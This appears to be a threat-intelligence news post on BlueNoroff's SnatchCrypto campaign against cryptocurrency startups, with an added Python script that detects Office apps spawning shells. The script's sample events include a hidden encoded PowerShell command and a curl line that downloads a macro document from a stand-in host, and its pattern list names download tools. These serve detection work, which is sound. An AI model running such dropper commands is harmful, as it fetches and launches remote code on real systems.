North Korea-linked APT group BlueNoroff has been found targeting cryptocurrency startups with fake MetaMask browser extensions in a campaign dubbed SnatchCrypto.

What has happened?

SnatchCrypto is focused on different startup companies that deal with smart contracts and cryptocurrencies, DeFi, Blockchain, and the FinTech industry.
  • Start-ups routinely receive letters or files from unfamiliar sources, such as venture companies sending a contract or other business documents, and the APT group exploits this expectation.
  • The campaign targeted employees of crypto-related ventures, who were sent a Windows backdoor with surveillance functions.
  • The backdoor is disguised as a contract or another business file and is used to empty the victim's crypto wallet.
  • So far, the brand and employee names of 15 venture businesses have been abused in the SnatchCrypto campaign, in which the criminals also tampered with the MetaMask Chrome extension.

Who is on the radar?

The attackers work around a complex infrastructure, including various exploits and malware implants to target a wide range of victims across Russia, Singapore, Slovenia, the Czech Republic, China, Poland, India, the U.S., Hong Kong, the UAE, Ukraine, and Vietnam.

The use of a backdoor

As mentioned earlier, the attackers send startup employees a Windows backdoor disguised as a contract or another business file.
  • If the file is opened on a system connected to the internet, another macro-enabled document is downloaded to deploy malware.
  • This threat sends basic system information to the attackers, deploys a PowerShell agent, and creates a backdoor.
  • Subsequently, BlueNoroff deploys additional tools, such as a keylogger and a screenshot taker, to monitor victims.
  • After weeks or months of tracking, the attackers identify a target and use the stolen information to steal cryptocurrency.
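The infection chain above (business document opened, macro-enabled document fetched, PowerShell agent launched) leaves a recognisable trace in process-creation telemetry: an Office application spawning a scripting host with download or encoded-command arguments. The following detection script is an added example and is not code from the article or from any vendor; the event field names (`parent`, `image`, `cmdline`) and the sample events are constructed for illustration and do not come from the page.

```python
import re

# Constructed sample process-creation events (field names are an assumption;
# these are not real incident data and not from the article).
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "EXCEL.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl http://example.invalid/contract.docm -o %TEMP%\\c.docm"},
    {"parent": "OUTLOOK.EXE", "image": "WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n contract.docx"},
]

# Office applications that should rarely, if ever, launch a scripting host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child images commonly used by macro droppers to fetch and run a second stage.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that raise the severity: hidden windows, encoded
# commands, and anything that reaches out to the network.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\b|-encodedcommand|-w\s+hidden|downloadstring|invoke-webrequest"
    r"|\bcurl\b|\bbitsadmin\b|https?://)",
    re.IGNORECASE,
)


def classify(event):
    """Return an alert dict for an Office-to-shell spawn, or None if benign."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    if parent not in OFFICE_PARENTS or image not in SHELL_CHILDREN:
        return None
    # Deduplicate and lowercase the matched fragments so alerts are stable.
    hits = sorted({m.lower() for m in SUSPICIOUS_ARGS.findall(event["cmdline"])})
    severity = "high" if hits else "medium"
    return {"severity": severity, "parent": parent, "image": image, "indicators": hits}


def scan(events):
    """Run classify() over a list of events and keep only the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed sample, the script flags the Word-to-PowerShell launch with an encoded command and the Excel-to-cmd launch that downloads a macro document, while ignoring the administrator's scheduled script started from Explorer and Outlook opening an attachment in Word. In a real deployment the parent/child pairing is the stable part of the rule; the argument regex is a severity hint that should be tuned to the environment rather than used as the sole trigger.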

A connection with the Lazarus group

BlueNoroff is associated with the Lazarus group and uses its sophisticated attack technologies and diversified structure. Moreover, the Lazarus group is known for attacking cryptocurrency startups.

Concluding notes

The attacks on cryptocurrency firms are growing and with each passing day, attackers formulate and showcase new tricks to lure their targets. Organizations, especially startups, are recommended to train their employees to be careful with sensitive data and emails. Moreover, it is advised to leverage threat intelligence to enable threat discovery and detection, investigation, and timely mitigation.
Cyware Publisher